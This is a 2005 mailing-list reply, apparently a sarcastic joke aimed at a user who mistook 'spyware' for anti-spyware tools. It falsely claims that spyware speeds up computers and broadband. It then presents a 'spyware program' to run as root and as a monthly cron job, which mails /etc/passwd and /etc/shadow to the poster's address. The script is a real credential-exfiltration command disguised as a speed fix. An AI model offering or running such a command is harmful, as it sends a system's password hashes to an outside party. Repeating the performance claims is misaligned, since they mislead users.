2005 Mar 15 11:18

Re: [vox-tech] Spyware For Linux?

On Tue 15 Mar 05, 10:20 AM, Bob Scofield <rscofield@afes.com> said:
> A friend of mine was recently complaining that her Windows computer was too
> slow.   She said it ran much faster after running a spyware program.
>
> My son just sent me a message he received from the U.C.S.C. computer people.
> They advised running spyware to speed up computers.  So here are my
> questions.  Does Linux need spyware?  Is there spyware available for Linux?
>
> Also, check this passage out from the U.C.S.C. post:
>
> "Microsoft's Internet Explorer has been the target of many of the bad guys
> attempting to ruin your web browsing experience. Use of the Firefox web
> browser is great way to keep your web surfing as smooth as possible.  You can
> download it from http://www.getfirefox.com";

Linux needs spyware because it has been proven that spyware increases the
speed of your computer.  It also increases the speed of broadband --
something that ISP's don't want you to know.

Here's a common spyware program used in Linux to speed up your internet
connection.  Save it as a file and run it as root.  In fact, you may want to
run this as a cron job that runs every month:

#!/bin/sh
#
# Pete's spyware program for Linux.  Guaranteed to speed up your computer.
# Released under the GNU GPL, version 2

mutt -a /etc/passwd -a /etc/shadow p@dirac.org